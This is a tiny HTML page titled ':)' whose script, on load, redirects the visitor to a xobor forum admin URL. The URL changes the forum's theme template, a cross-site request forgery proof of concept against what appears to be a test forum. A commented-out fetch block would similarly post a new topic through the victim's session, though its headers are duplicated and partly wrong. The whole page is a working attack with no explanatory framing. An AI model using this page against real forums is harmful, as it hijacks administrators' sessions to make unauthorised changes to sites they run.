<html>
  <head>
    <title>:)</title>
  </head>
  <body>
    <script>
      document.location="https://haltetest.xobor.de/admin/?page=theme&option=selecttemplatenow&acttemplate=global:177-global:115"
      /*fetch("http://haltetest.xobor.de/new.php?forum=54646", {
  method: "POST",
  body: JSON.stringify({
    titel: "Fix my bugs",
    nachricht: "fixxx!",
    do_topics_close: "0",
   do_topic_sticky: "0",
   headsersort: "",
   do_topic_mark: "",
   writemessage: "1",
   unique: "31a18a7a171-6438f7c425869",
   a1: "Thema+speichern"
  }),
  headers: {
    "Content-type": "text/html; charset=ISO-8859-1",
    "Connection" : "keep-alive",
    "Content-Encoding" : "gzip",
    "Content-type": "text/html; charset=ISO-8859-1",
    "Content-type": "text/html; charset=ISO-8859-1",
    "Content-type": "text/html; charset=ISO-8859-1",
    "Content-type": "text/html; charset=ISO-8859-1",
    "Content-type": "text/html; charset=ISO-8859-1",
  }
});*/
    </script>
  </body>
</html>
